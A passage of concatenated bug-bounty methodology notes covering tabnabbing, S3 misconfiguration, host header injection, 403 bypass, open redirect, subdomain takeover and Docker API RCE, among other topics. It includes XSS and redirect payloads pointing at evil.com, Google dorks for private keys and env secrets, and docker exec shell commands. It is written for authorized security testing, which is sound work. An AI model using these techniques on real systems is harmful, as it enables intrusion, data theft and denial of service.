2 | 3 | A weak password policy increases the probability of an attacker having success using brute force and dictionary attacks against user accounts. An attacker who can determine user passwords can take over a user's account and potentially access sensitive data in the application. 4 | 5 | There are two ways in which this can be checked 6 | 7 | ### First Way 8 | 9 | - Check if you can use Password same as that of Email Address 10 | - Check if you can use Username same as that of Email Address 11 | - Try above mentioned when Resetting Password , Creating Account , Changing Password from Account Settings 12 | 13 | ### Second Way 14 | 15 | - Check if you can use Password some Weak Passwords such as 123456, 111111 , abcabc , qwerty123 16 | - Try above mentioned when Resetting Password , Creating Account , Changing Password from Account Settings 17 | 18 | * Applications usually have Restrictions on Password while Creating Account, Make sure you check for both the cases when Resetting Password 19 | 20 | 21 | ### References 22 | 23 | - [All About Weak Password Policy](http://applicationsecurity.io/appsec-findings-database/weak-password-policy/) 24 | - [OWASP Guide for Weak Passwords](https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/04-Authentication_Testing/07-Testing_for_Weak_Password_Policy) 25 | -------------------------------------------------------------------------------- /BrokenLinkHijacking/BrokenLinkHijacking.md: -------------------------------------------------------------------------------- 1 | 2 | ## Steps 3 | 4 | 1. Manually find and click external links on the target site ( For Example:- Some Links to Social Media Accounts or Some external Media Link) 5 | 2. While Doing Manual work also put [broken-link-checker](https://github.com/stevenvachon/broken-link-checker) in background using below Command interminal. 6 | 7 | `blc -rof --filter-level 3 https://example.com/` 8 | 9 | Ouput will be like Something. 10 | 11 | `─BROKEN─ https://www.linkedin.com/company/ACME-inc-/ (HTTP_999)` 12 | 13 | 3. Now you need to check if company has the page or not , if no then register as the company or try to get that username or url. 14 | 15 | ## Alternate Step 16 | 1. Go to [Online Broken Link Checker](https://ahrefs.com/broken-link-checker), [Dead Link Checker](https://www.deadlinkchecker.com/) Or [Alternative Online Broken Link Checker](https://brokenlinkcheck.com/) 17 | 2. Input the domain name 18 | 19 | ## Reference 20 | 21 | * [https://edoverflow.com/2017/broken-link-hijacking/](https://edoverflow.com/2017/broken-link-hijacking/) 22 | * [https://medium.com/@bathinivijaysimhareddy/how-i-takeover-the-companys-linkedin-page-790c9ed2b04d](https://medium.com/@bathinivijaysimhareddy/how-i-takeover-the-companys-linkedin-page-790c9ed2b04d) 23 | 24 | ### Author: 25 | * [@KathanP19](https://twitter.com/KathanP19) 26 | * [@cyph3r_asr](https://twitter.com/cyph3r_asr) 27 | * [@v3daxt](https://twitter.com/v3daxt) 28 | -------------------------------------------------------------------------------- /Misconfigurations/Default_Credential_And_Admin_Panel.md: -------------------------------------------------------------------------------- 1 | 2 | ## Default Credentials Basics 3 | 4 | - Default Software Configurations for admin console of webapp 5 | ``` 6 | https://www.target.com/admin 7 | https://www.target.com/admin-console 8 | https://www.target.com/console 9 | https://admin.target.com 10 | https://admin-console.target.com 11 | https://console.target.com 12 | ``` 13 | 14 | ## 1. Getting access through third party services 15 | 16 | * When the admin console login page is working on a third party service,then just search for it's default credentials on Google 17 | * Third Party service URL are of the format: https://target..com/login 18 | * Some examples are Okta,WP etc 19 | 20 | ## 2. Bypass to get access to login page 21 | ``` 22 | 1. This bypass is used when you are forbidden to get access to admin login page 23 | 2. We use Header Injection for this bypass 24 | 3. `X-Orginal-URL: /admin` or `X-Rewrite-URL:/admin` 25 | 4. Use this Header under Host 26 | 27 | * Use Burp to capture then check 28 | ``` 29 | ## Hackerone Reports : 30 | - https://hackerone.com/reports/192074 31 | - https://hackerone.com/reports/174883 32 | - https://hackerone.com/reports/398797 33 | 34 | ## Reference : 35 | https://www.owasp.org/index.php/Testing_for_default_credentials_(OTG-AUTHN-002) 36 | https://www.owasp.org/index.php/Testing_for_Default_or_Guessable_User_Account_(OWASP-AT-003) 37 | 38 | ## Author: 39 | * [@e11i0t_4lders0n](https://twitter.com/e11i0t_4lders0n) 40 | -------------------------------------------------------------------------------- /Sensitive_Info_Leaks/Github_Recon_Method.md: -------------------------------------------------------------------------------- 1 | # Github Recon 2 | Using Github we can find sensitive infos. 3 | 4 | ## Steps: 5 | 6 | 1. Check github with company name for API keys or passswords. 7 | 2. Enumerate the employees of the company from linkedin and twitter and check their repositories on github for sensitive information. 8 | 3. Check source code of main website and subdomains for github links in the html comments or anywhere. Search using ctl-F and search for keyword github 9 | 10 | ## Tools and references:: 11 | * https://github.com/BishopFox/GitGot 12 | * https://github.com/hisxo/gitGraber 13 | * https://github.com/tillson/git-hound 14 | * https://securitytrails.com/blog/github-dorks 15 | 16 | ## Reports (Hackerone) 17 | 18 | ### Resolved 19 | 20 | - [Important information leaked on Github](https://hackerone.com/reports/649322) 21 | - [Github Token Leaked publicly for https://github.com/mopub](https://hackerone.com/reports/612231) 22 | - [CircleCI token in github repo allows for access to sensitive build information](https://hackerone.com/reports/858915) 23 | - [Information Leak - Github - JMS Information](https://hackerone.com/reports/360811) 24 | - [Leaked artifactory_key, artifactory_api_key, and gcloud refresh_token via GitHub.](https://hackerone.com/reports/496414) 25 | - [Github Token Leaked publicly for https://github.sc-corp.net](https://hackerone.com/reports/396467) 26 | 27 | ## Author: 28 | * [@0xCCFFF](https://twitter.com/0xCCFFF) (MadMaxx) 29 | * [@klaus](https://twitter.com/klaus_dev) 30 | -------------------------------------------------------------------------------- /Tabnabbing/Tabnabbing.md: -------------------------------------------------------------------------------- 1 | # Tabnabbing 2 | 3 | Even though this vulnerability is rated by many bug bounty programs as a low severity bug, it is worth looking for it as it is very easy to find. 4 | 5 | ### More information about the vulnerability: 6 | 7 | When tabnabbing, the attacker searches for links that are inserted into the website and are under his control. Such links may be contained in a forum post, for example. Once he has found this kind of functionality, it checks that the link's `rel` attribute does not contain the value `noopener` and the target attribute contains the value `_blank`. If this is the case, the website is vulnerable to tabnabbing. 8 | 9 | ### How to exploit: 10 | ``` 11 | 1. Attacker posts a link to a website under his control that contains the following JS code: window.opener.location = "http://evil.com" 12 | 2. He tricks the victim into visiting the link, which is opened in the browser in a new tab. 13 | 3. At the same time the JS code is executed and the background tab is redirected to the website evil.com, which is most likely a phishing website. 14 | 4. If the victim opens the background tab again and doesn't look at the address bar, it may happen that he thinks he is logged out, because a login page appears, for example. 15 | 5. The victim tries to log on again and the attacker receives the credentials 16 | ``` 17 | 18 | ### How to search for it: 19 | 20 | As already mentioned, you have to search for the following link formats: 21 | 22 | ```html 23 | 24 | or 25 | 26 | ``` 27 | 28 | ### Author 29 | 30 | * [@bolli95](https://github.com/bolli95) 31 | -------------------------------------------------------------------------------- /Misconfigurations/S3-Bucket_Misconfig.md: -------------------------------------------------------------------------------- 1 | 2 | ## How to check for amazon S3 Bucket Misconfiguration. 3 | * First of all, you need to install aws cli - `Pip install awscli` 4 | * Dont Forget to Set: 5 | \- Access key 6 | \- Secret key 7 | 8 | **1.** **Check is you can list iteams from the bucket.** 9 | `aws s3 ls s3://` 10 | * See if you are able to access that bucket. 11 | * If the bucket is not accessible, still we can try to exploit it. 12 | 13 | * If you are getting some errors then run this command 14 | `aws s3 ls s3:// --no-sign-request` 15 | 16 | **2. Try moving the files or deleting it and see if you are able to do that or not** 17 | * If it is possible to move files then it is vulnerable and you can report it otherwise it is not vulnerable 18 | * First Make a file 19 | `echo "Testing purpose" >> test.txt ` 20 | * Now try command to move the file into the bucket. 21 | `aws s3 mv test.txt s3://` 22 | * Also try command to copy the file from local drive to the S3 bucket. 23 | `aws s3 cp test.txt s3://[bucketname]/test.txt` 24 | 25 | **3. Delete files from the bucket.** 26 | * Command to delete the file into the bucket 27 | `aws s3 rm test.txt s3:///test.txt` *(if that is present)* 28 | 29 | 30 | ## References : 31 | * [Hackerone Report](https://hackerone.com/reports/700051) 32 | * [Hackerone Report](https://hackerone.com/reports/229690) 33 | * [https://bugbountypoc.com/s3-bucket-misconfiguration-from-basics-to-pawn](https://bugbountypoc.com/s3-bucket-misconfiguration-from-basics-to-pawn) 34 | 35 | ## Author : 36 | * [Anishka Shukla](https://twitter.com/AnishkaShukla) 37 | * [Anubhav Singh](https://twitter.com/AnubhavSingh_) 38 | -------------------------------------------------------------------------------- /Host-Header/Host-Header.md: -------------------------------------------------------------------------------- 1 | # Summary For Host Header 2 | ![https://pbs.twimg.com/media/ET39wJOWoAAfTBb?format=jpg&name=small](https://pbs.twimg.com/media/ET39wJOWoAAfTBb?format=jpg&name=small) 3 | 4 | # Also Check This Things While Testing 5 | 1. Add two `HOST:` in Request. 6 | 2. Try this Headers 7 | ``` 8 | X-Original-Url: 9 | X-Forwarded-Server: 10 | X-Host: 11 | X-Forwarded-**Host**: 12 | X-Rewrite-Url: 13 | ``` 14 | 3. If you come across `/api.json` in any AEM instance during bug hunting, try for web cache poisoning via following 15 | `Host: , X-Forwarded-Server , X-Forwarded-Host:` 16 | and or simply try https://localhost/api.json HTTP/1.1 17 | 4. Also try `Host: redacted.com.evil.com` 18 | 5. Try Host: evil.com/redacted.com 19 | [https://hackerone.com/reports/317476](https://hackerone.com/reports/317476) 20 | 6. Try this too `Host: example.com?.mavenlink.com` 21 | 7. Try `Host: javascript:alert(1);` Xss payload might result in debugging mode. 22 | [https://blog.bentkowski.info/2015/04/xss-via-host-header-cse.html](https://blog.bentkowski.info/2015/04/xss-via-host-header-cse.html) 23 | 8. Host Header to Sqli 24 | [https://blog.usejournal.com/bugbounty-database-hacked-of-indias-popular-sports-company-bypassing-host-header-to-sql-7b9af997c610](https://blog.usejournal.com/bugbounty-database-hacked-of-indias-popular-sports-company-bypassing-host-header-to-sql-7b9af997c610) 25 | 9. Bypass front server restrictions and access to forbidden files and directories through `X-Rewrite-Url/X-original-url:` 26 | `curl -i -s -k -X 'GET' -H 'Host: ' -H 'X-rewrite-url: admin/login' 'https:///'.` 27 | 28 | 29 | ## Author: 30 | * [@KathanP19](https://twitter.com/KathanP19) 31 | -------------------------------------------------------------------------------- /XXE/Billion_Laugh_Attack.md: -------------------------------------------------------------------------------- 1 | # Billion Laugh Attack 2 | - Another common vulnerability associated with XML parsing is called A Billion Laughs Attack. It uses an entity to resolve itself cyclically thereby consuming more CPU usage and causing a denial of service attack. An Example XML payload that can cause an XXE attack is as follows: 3 | 4 | ``` 5 | Step 1 : Capture the request into Burp 6 | Step 2 : Send it to the repeater tab and then convert the body into XML whether it is accepting or not 7 | Step 3 : To confirm, Check for the [ Accept ] Header change it into Application/json 8 | Step 4 : Covert JSON into XML if their is no Possibility 9 | Step 5 : Add the payload in between and change the content lol1 to lol9 depending on the dos variation in the xml field! 10 | ``` 11 | 12 | - Billion Laugh Payload : 13 | ``` 14 | 15 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | ]> 28 | &lol9; 29 | ``` 30 | 31 | ## Contributor: 32 | - [N3T_hunt3r](https://twitter.com/N3T_hunt3r) 33 | -------------------------------------------------------------------------------- /API_Testing/Hidden_API_Functionality_Exposure.md: -------------------------------------------------------------------------------- 1 | # Hidden API Functionality Exposure 2 | - Application programming interfaces (APIs) have become a critical part of almost every business. APIs are responsible for transferring information between systems within a company or to external companies. For example, when you log in to a website like Google or Facebook, an API processes your login credentials to verify they are correct. 3 | 4 | 1. Swagger UI Documentation 5 | 2. Dictionary Attack | Brute force 6 | 3. Common wordlist for API Enum : 7 | - https://wordlists.assetnote.io/ 8 | - https://github.com/Net-hunter121/API-Wordlist 9 | 10 | ## Steps to Perform This Attack : 11 | ``` 12 | Step 1 : Capture the request into Burp, Send the request to repeater and intruder tab. 13 | Step 2 : Add the endpoint into the intruder tab and add the payload from the word-list. 14 | Step 3 : First use dictionary attack with SecLists (https://github.com/danielmiessler/SecLists) on the Endpoint. 15 | Step 4 : Either use your customized list or use the ones which I have provided in the above step. 16 | Step 5 : Then simply start the attack, start checking for 200 status. 17 | Step 7 : Once there is HTTP 200 OK status, start the recursive scan on the same endpoint for juicy information like swagger doc and so on. 18 | step 8 : Other method is to change the API version and try bruteforcing the same endpoint 19 | Eg: Redacted.com/api/v1/{Endpoint} ----- Redacted.com/api/v2/{Endpoint} 20 | ``` 21 | * Note: There will be minimum limits per request which will be assigned without API keys so make sure to utilize manual approach as much as you can, then the rest can be automated for scanning the vulnerability in API with automated tools. 22 | 23 | ## Contributor: 24 | - [N3T_hunt3r](https://twitter.com/N3T_hunt3r) 25 | -------------------------------------------------------------------------------- /Sensitive_Info_Leaks/Google_Dorks.md: -------------------------------------------------------------------------------- 1 | ### Google Dorks to find Juicy Content 2 | 3 | `inurl:example.com intitle:"index of"`
4 | `inurl:example.com intitle:"index of /" "*key.pem"`
5 | `inurl:example.com ext:log`
6 | `inurl:example.com intitle:"index of" ext:sql|xls|xml|json|csv`
7 | `inurl:example.com "MYSQL_ROOT_PASSWORD:" ext:env OR ext:yml -git`
8 | `inurl:example.com intitle:"index of" "config.db"`
9 | `inurl:example.com allintext:"API_SECRET*" ext:env | ext:yml`
10 | `inurl:example.com intext:admin ext:sql inurl:admin`
11 | `inurl:example.com allintext:username,password filetype:log`
12 | `site:example.com "-----BEGIN RSA PRIVATE KEY-----" inurl:id_rsa`
13 | `site:*.gov.* "responsible disclosure"`
14 | 15 | ![t](https://miro.medium.com/max/550/1*N9W6DfGA6wxgKTiywV9aUA.png)
16 | 17 | 18 | [Refrence](https://blog.usejournal.com/how-recon-helped-samsung-protect-their-production-repositories-of-samsungtv-ecommerce-estores-4c51d6ec4fdd) 19 | 20 | 21 | #### Other than Google, Try these dorks on various Search Engines such as Duck Duck Go, Bing etc. 22 | 23 | ## Reports (Hackerone) 24 | 25 | ### Resolved 26 | 27 | - [Securing "Reset password" pages from bots](https://hackerone.com/reports/43807) 28 | - [Private Grab Messages on Android App can be accessed and cached by Search Engines](https://hackerone.com/reports/221558) 29 | 30 | ### Informative 31 | 32 | - [Information disclosure through search engines (password reset token)](https://hackerone.com/reports/322988) 33 | 34 | ### N/A 35 | 36 | - [Research papers on yelp are getting indexed by google bots.](https://hackerone.com/reports/207435) 37 | 38 | 39 | Author 40 | - [Keshav Malik](twitter.com/g0t_rOoT_)
41 | - [Naveen Prakaasham](twitter.com/NPrakaasham)
42 | - [@klaus](https://twitter.com/klaus_dev) 43 | - [Fani Malik](https://twitter.com/fanimalikhack) 44 | -------------------------------------------------------------------------------- /Status_Code_Bypass/403Bypass.md: -------------------------------------------------------------------------------- 1 | ## 403 Bypass 2 | I am sharing all this tips and techniques from my own personal experience there no official references for that 3 | 4 | ### Directory Based 5 | If you see directory with no slash at end then do these acts there 6 | ``` 7 | site.com/secret => 403 8 | site.com/secret/* => 200 9 | site.com/secret/./ => 200 10 | ``` 11 | ### File Base 12 | If you see file without any slash at end then do these acts there 13 | ``` 14 | site.com/secret.txt => 403 15 | site.com/secret.txt/ => 200 16 | site.com/%2f/secret.txt/ => 200 17 | ``` 18 | ### Protocol Base 19 | Well, sound wired but check out the example for better understanding 20 | ``` 21 | https://site.com/secret => 403 22 | http://site.com/secret => 200 23 | ``` 24 | ## Payloads 25 | ``` 26 | / 27 | /* 28 | /%2f/ 29 | /./ 30 | ./. 31 | /*/ 32 | ``` 33 | ### Header 34 | [https://observationsinsecurity.com/2020/08/09/bypassing-403-to-get-access-to-an-admin-console-endpoints/](https://observationsinsecurity.com/2020/08/09/bypassing-403-to-get-access-to-an-admin-console-endpoints/) 35 | ``` 36 | X-Forwarded-For: 127.0.0.1 37 | ``` 38 | 39 | ### Tools 40 | Here is a Tool I found on twitter. 41 | * [https://github.com/yunemse48/403bypasser](https://github.com/yunemse48/403bypasser) 42 | * [https://github.com/Dheerajmadhukar/4-ZERO-3](https://github.com/Dheerajmadhukar/4-ZERO-3) 43 | 44 | ## Proof Of Concept 45 | Well Always look for some references or proof of concept if someone sharing any tips so you may confirm you are not wasting your time at all. 46 | I have some poc video on my YouTube channel for 403 and other Improper access control bugs with those methods. You can check them 47 | 48 | YouTube: [Mehedi Hasan Remon](https://www.youtube.com/channel/UCF_yxU7acxUojiGiOAMafQQ/videos?view_as=subscriber) 49 | 50 | Author:[@remonsec](https://twitter.com/remonsec) 51 | [@KathanP19](https://twitter.com/KathanP19) 52 | -------------------------------------------------------------------------------- /Open_Redirection/find_OpenRedirect_trick.md: -------------------------------------------------------------------------------- 1 | ## A small trick to find Open Redirection if you couldn't find any Redirection parameters. 2 | 3 | *"I apply this everytime while testing web applications and found many Open Redirects and even an XSS using this trick!"* 4 | 5 | ### Steps: 6 | ------------------------------------------------------------------------------------------------------------------------------------------------------------ 7 | 1. If the Applictaion have a user Sign-In/Sign-Up feature, then register a user and log in as the user. 8 | 9 | 2. Go to your user profile page , for example : samplesite.me/accounts/profile 10 | 11 | 3. Copy the profile page's URL 12 | 13 | 4. Logout and Clear all the cookies and go to the homepage of the site. 14 | 15 | 5. Paste the Copied Profile URL on the address bar 16 | 17 | 6. If the site prompts for a login , check the address bar , you may find the login page with a redirect parameter like the following 18 | - https://samplesite.me/login?next=accounts/profile 19 | - https://samplesite.me/login?retUrl=accounts/profile 20 | 21 | 7. Try to exploit the parameter by adding an external domain and load the crafted URL 22 | eg:- https://samplesite.me/login?next=https://evil.com/ 23 | (or) 24 | https://samplesite.me/login?next=https://samplesite.me@evil.com/ #(to beat the bad regex filter) 25 | 26 | 8. If it redirects to evil.com , thers's your open redirection bug. 27 | 28 | 9. Try to leverage it to XSS 29 | eg:- https://samplesite.me/login?next=javascript:alert(1);// 30 | 31 | ------------------------------------------------------------------------------------------------------------------------------------------------------------- 32 | 33 | #### Author: [febinrev](https://twitter.com/febinrev) 34 | -------------------------------------------------------------------------------- /Subdomain_Takeover/Easy_Methods.md: -------------------------------------------------------------------------------- 1 | # 1. Method by [@Virdoex_hunter](https://twitter.com/Virdoex_hunter) 2 | Easy Subdomain Takeover Method 3 | ``` 4 | Step: 5 | 6 | 1:Grab all subdomains of target. i.e, subfinder -d flaws.cloud | tee -a domains.txt 7 | 8 | 2:Run this one liner 9 | 10 | 3:cat domains.txt | while read domain;do dig $domain;done | tee -a digs.txt 11 | 12 | 4::Grab all the CNAME Entries i.e, cat digs.txt | grep CNAME 13 | 14 | 5:Find a domain that is pointed to third party domain like sub.exampple.com CNAME x.aws.com 15 | 16 | 6:Check wheather the main subdomain is down 17 | 18 | 7:Go to host provider where the domain is pointed to and register that domain if you registered congrats you have takeover the subdomain. 19 | 20 | ``` 21 | 22 | # 2. Method by [@WhoIs1nVok3r](https://twitter.com/WhoIs1nVok3r) 23 | ``` 24 | Step-1:- First of all collect all subdomain of the target using assetfinder,subfinder,chaos(needs API key). 25 | 26 | Step-2:- Next sort out duplicate URLs using -- cat unresolved | sort -u | tee -a resolved 27 | 28 | Step-3:- Pass it to subzy,subjack or other subdomain-takeover tool -- using subzy tool -- subzy -targets resolved , or use subjack 29 | 30 | Step-4:- We can also use nuclei templates but we need to first use httpx -- cat resolved | httpx | tee -a hosts 31 | 32 | Step-5:- Next use nuclei-templates -- cat hosts | nuclei -t nuclei-templates/vulnerabilites -o nuclei.txt -v 33 | 34 | Tools Used:- 35 | 36 | https://github.com/projectdiscovery/nuclei 37 | https://github.com/projectdiscovery/subfinder 38 | https://github.com/projectdiscovery/httpx 39 | https://github.com/projectdiscovery/nuclei-templates 40 | https://github.com/projectdiscovery/chaos-client 41 | https://github.com/haccer/subjack 42 | https://github.com/LukaSikic/subzy 43 | ``` 44 | 45 | ## Author 46 | * [@Virdoex_hunter](https://twitter.com/Virdoex_hunter) 47 | * [@WhoIs1nVok3r](https://twitter.com/WhoIs1nVok3r) 48 | -------------------------------------------------------------------------------- /Misconfigurations/Docker.md: -------------------------------------------------------------------------------- 1 | # Docker API unauthorized RCE 2 | - Docker is an open-source platform for developers and other IT professionals to help build, ship, and run distributed applications. 3 | the docker daemon (dockerd) provides an API service used for remote control of docker service the default daemon listen on Unix /var/run/docker.sock and when bound to a public interface can be used by an attacker to compromise container system due to lack of default authentication 4 | 5 | ## Background concept: 6 | 7 | - The host is running docker: daemon bound to the external interface with no access control or authentication 8 | - Attacker uses docker API function to enumerate manage and control the container service the attacker is able to control existing deployed container or create another one. 9 | - Docker API provides JSON response containing the output of command issued. 10 | - Enumerating docker API services 11 | - By default, the Docker host remote API listens on ports 2375 / 2376 and has no authentication. If the port is not blocked, docker host APIs can be accessed over the public internet. 12 | 13 | ``` 14 | nmap IP:2375/2376 15 | nmap -p- IP 16 | nmap -Pn -p 2375 IP 17 | nmap -sV -p 2375 IP 18 | ``` 19 | - To confirm that the docker is service is running on the target we can give the string in the browser and check the response 20 | ex: `https://IP:2375` 21 | - we will receive a response something like this 22 | `{"message":"page not found"}` 23 | - and to confirm the version details we can use this 24 | `https://IP:2375/version` 25 | 26 | - The command used to exploit 27 | 28 | - This command is used to get all the information about the docker container 29 | `docker -H IP:2375 info` 30 | 31 | - List all the running containers 32 | `docker -H IP:2375 ps` 33 | 34 | - List all the stopped containers 35 | `docker -H IP:2375 ps -a` 36 | 37 | - Docker command for RCE 38 | `docker -H IP:2375 exec -it container_name /bin/bash` 39 | 40 | ## Contributor: 41 | - [N3T_hunt3r](https://twitter.com/N3T_hunt3r) 42 | -------------------------------------------------------------------------------- /Recon/Workflow.md: -------------------------------------------------------------------------------- 1 | ## Recon workflow 2 | 3 | 1. IP space discovery 4 | 2. TLDs, Acquisitions, & Relations 5 | 3. Subdomain Enum 6 | 4. Fingerpirnting 7 | 5. Dorking 8 | 6. Content Discovery 9 | 7. Parameter Discovery 10 | 11 | ## ASN Discovery 12 | 13 | **ASN Discovery of Target:** 14 | 15 | [https://bgp.he.net](https://bgp.he.net/) 16 | 17 | **ASN using whois:** 18 | 19 | `whois -h whois.cymru.com $(dig +short example.com)` 20 | 21 | NOTE: Be careful cause sometimes you might get ASN for VPSs like digital ocean etc. Don't work on them. 22 | 23 | **Using Nmap & ASN for discoverying IP related to the targetted ASN** 24 | 25 | `nmap --script targets-asn --script-args targets-asn.asn=` 26 | 27 | **Gathering Company intel using AMASS** 28 | 29 | `amass intel -org ` 30 | 31 | **ARIN for ASN:** 32 | 33 | [`https://whois.arin.net`](https://whois.arin.net/) 34 | 35 | **Site: IPINFO for ASN** 36 | 37 | [`https://ipinfo.io`](https://ipinfo.io/) 38 | 39 | **Subdomains using ASNs using AMASS:** 40 | 41 | `amass intel -asn ` 42 | 43 | ## Discovering Brands 44 | 45 | -***Looking for acquisition or related orgs to target*** 46 | 47 | - wikipedia 48 | - Crunchbase 49 | 50 | [Crunchbase: Discover innovative companies and the people behind them](https://www.crunchbase.com) 51 | 52 | - Owler 53 | 54 | [](http://owler.com/) 55 | 56 | - Accquiredby 57 | 58 | [AcquiredBy | Definitive list of bootstrapped acquisitions](https://acquiredby.co/) 59 | 60 | - LinkedIn 61 | - ReverseWhois using amass intel module 62 | 63 | `amass intel -d [domain.com](http://domain.com) -whois` 64 | 65 | - BuiltWith 66 | 67 | [BuiltWith](https://builtwith.com/) 68 | 69 | - Google dork: 70 | 71 | `intext:"copyright ©️ org_name"` 72 | 73 | - Shodan Dork using HTTP favicon hashes 74 | 75 | `http.favicon.hash:` 76 | 77 | **Favicon hash can be found using [favfreak](https://github.com/devanshbatham/FavFreak)** 78 | 79 | ### Author 80 | [Mr._fr3qu3n533](https://twitter.com/mr_fr3qu3n533) 81 | -------------------------------------------------------------------------------- /GraphQL/GraphQL.md: -------------------------------------------------------------------------------- 1 | ## Videos 2 | - GraphQL Video - [InsiderPhd](https://www.youtube.com/watch?v=GlvNwhq-uBg) 3 | - [REST in Peace: Abusing GraphQL to Attack Underlying Infrastructure - LevelUp 0x05](https://www.youtube.com/watch?v=NPDp7GHmMa0) 4 | 5 | ## Blogs 6 | - Exploit GraphQL - [Yeswehack Blog](https://blog.yeswehack.com/yeswerhackers/how-exploit-graphql-endpoint-bug-bounty/) 7 | - Hacking GraphQL - [Part 1](https://infosecwriteups.com/hacking-graphql-for-fun-and-profit-part-1-understanding-graphql-basics-72bb3dd22efa) [Part 2](https://infosecwriteups.com/hacking-graphql-for-fun-and-profit-part-2-methodology-and-examples-5992093bcc24) 8 | - [That single GraphQL issue that you keep missing](https://blog.doyensec.com/2021/05/20/graphql-csrf.html) by [Doyensec](https://www.doyensec.com/) 9 | - [Reverse engineer a GraphQL API](https://swizec.com/blog/reverse-engineer-a-graphql-api-to-automate-love-notes-codewithswiz-24) 10 | - [Exploiting GraphQL](https://blog.assetnote.io/2021/08/29/exploiting-graphql/) by [Assetnote](https://assetnote.io/) 11 | - [GraphQL Resources Thread](https://twitter.com/holybugx/status/1441460070387261440?s=21) by [HolyBugx](https://twitter.com/HolyBugx) 12 | - [GraphQL Test Cases](https://anmolksachan.github.io/graphql/) 13 | 14 | # Tools 15 | - [GraphQL Voyager](https://apis.guru/graphql-voyager/) 16 | - [GraphQL Cheatsheet](https://devhints.io/graphql) 17 | - [AutoGraphQL](https://graphql-dashboard.herokuapp.com/) - Demo [Video ](https://www.youtube.com/watch?v=JJmufWfVvyU) 18 | - [graphw00f](https://github.com/dolevf/graphw00f) - GraphQL Server Engine Fingerprinting utility to learn more about what technology is behind a given GraphQL endpoint 19 | - [InQL - Introspection GraphQL Scanner](https://portswigger.net/bappstore/296e9a0730384be4b2fffef7b4e19b1f) - A security testing tool to facilitate GraphQL technology security auditing efforts 20 | - [Graphicator is a GraphQL "scraper" / extractor](https://github.com/cybervelia/graphicator) 21 | 22 | # Labs 23 | - Damn-Vulnerable-GraphQL-Application - [Github](https://github.com/dolevf/Damn-Vulnerable-GraphQL-Application) 24 | -------------------------------------------------------------------------------- /XSS/XSS_Bypass.md: -------------------------------------------------------------------------------- 1 | # XSS Filter Bypass Techniques 2 | 3 | ## Introduction 4 | 5 | For those new to Cross-Site Scripting (XSS) attacks, it is essential to first understand the fundamental concepts before exploring filter bypass techniques. 6 | 7 | --- 8 | 9 | ## Alternatives to `alert()` 10 | 11 | Many web applications block the `alert()` function to mitigate XSS attacks. Below are alternative functions that can be used: 12 | 13 | - **`confirm()`** instead of `alert()` 14 | - **`prompt()`** instead of `alert()` 15 | - **`console.log()`** instead of `alert()` 16 | - **`eval()`** instead of `alert()` 17 | 18 | --- 19 | 20 | ## Alternatives to the `onerror` Event Handler 21 | 22 | If the `onerror` event handler is blocked, the following alternatives can be used to trigger JavaScript execution: 23 | 24 | - **`onload`** 25 | - **`onfocus`** 26 | - **`onmouseover`** 27 | - **`onblur`** 28 | - **`onclick`** 29 | - **`onscroll`** 30 | 31 | These event handlers can be embedded within HTML elements to execute scripts when the event is triggered. 32 | 33 | --- 34 | 35 | ## Handling Parentheses Filtering 36 | 37 | If parentheses `()` are filtered, backticks `` ` ` `` can be used as an alternative. Examples: 38 | 39 | ```html 40 | 41 | 42 | 43 | javascript:prompt`1` 44 | javascript:alert`1` 45 | ``` 46 | 47 | This method is effective against weak input sanitization mechanisms that only block standard function calls enclosed in parentheses. 48 | 49 | --- 50 | 51 | ## Additional Resources 52 | 53 | For further learning and reference, the following resources provide comprehensive details on XSS filter evasion techniques: 54 | 55 | 1. **PortSwigger XSS Cheat Sheet** - [Visit PortSwigger](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet) 56 | 2. **OWASP XSS Filter Evasion Cheat Sheet** - [Visit OWASP](https://owasp.org/www-community/xss-filter-evasion-cheatsheet) 57 | 58 | --- 59 | 60 | ## Contact Information 61 | 62 | For discussions and insights, you can connect with: 63 | 64 | - **[@Fani Malik](https://twitter.com/fanimalikhack/)** 65 | 66 | --- 67 | *Enhanced and reformatted for HowToHunt repository by [remonsec](https://x.com/remonsec)* 68 | -------------------------------------------------------------------------------- /Recon/subdomain_enumeration.md: -------------------------------------------------------------------------------- 1 | # Subdomain Enumeration 2 | Well, subdomain enumeration is important when you are hunting on wildcard enable scope programs. 3 | If you are able to get unique subdomains that other miss then it's a good chance for you to get some bugs 4 | 5 | # General Methodology 6 | * Passive 7 | * Active 8 | * Permutation 9 | 10 | ## Passive 11 | In this stage you have to use as much resources as you can to passivly gather subdomains 12 | Now a days it's not that much hard to do with community standard tools that usages API keys 13 | 14 | ### Tools 15 | 16 | * Subfinder 17 | * Amass 18 | * Assetfinder 19 | * Findomain 20 | 21 | ## Active 22 | In this stage you have to perform bruteforcing on your target host to see if the word from your wordlist resolve as valid subdomain or not 23 | 24 | ### Tools 25 | 26 | * ShuffleDNS 27 | * Aiodnsbrute 28 | 29 | ## Permutation 30 | In this stage you have to play around the subdomains. Now do changed with the words and see still it resolve as valid or not 31 | 32 | ## Portscan 33 | Convert domains into ip address 34 | ```bash 35 | while read l; do ip=$(dig +short $l|grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b"|head -1);echo "[+] '$l' => $ip";echo $ip >> ips.txt;done < domains.txt 36 | 37 | ``` 38 | 39 | we will use masscan for faster results 40 | 41 | >masscan -p1-65535 -iL ips.txt --max-rate 1800 -oG output.log 42 | 43 | or you can use [Naabu](https://github.com/projectdiscovery/naabu), [RustScan](https://github.com/RustScan/RustScan/). 44 | 45 | ### Tools 46 | 47 | * AltDNS 48 | * DNSGen + ShuffleDNS 49 | 50 | ## Reference & Resources 51 | 52 | https://pentester.land/cheatsheets/2018/11/14/subdomains-enumeration-cheatsheet.html 53 | 54 | https://0xpatrik.com/subdomain-enumeration-2019/ 55 | 56 | https://0xpatrik.com/subdomain-enumeration-smarter/ 57 | 58 | https://rootsploit.com/bug-bounty-recon-faster-port-scan/ 59 | 60 | Theres a lot you can do. For now just mentioning communty standard approaches. Will be updating it regularly depending on the methodology comes out. 61 | 62 | ## Framework 63 | An automated framework can be used to automate those whole workflow 64 | 65 | * [SEF](https://github.com/remonsec/SEF) 66 | ___ 67 | ## Author 68 | [Mehedi Hasan Remon](https://twitter.com/remonsec) 69 | [Rishi Choudhary](https://twitter.com/0xRyuk) -------------------------------------------------------------------------------- /CSRF/Cross_Site_Request_Forgery_Bypass.md: -------------------------------------------------------------------------------- 1 | **Cross Site Request Forgery(CSRF)** 2 | 3 | Hello 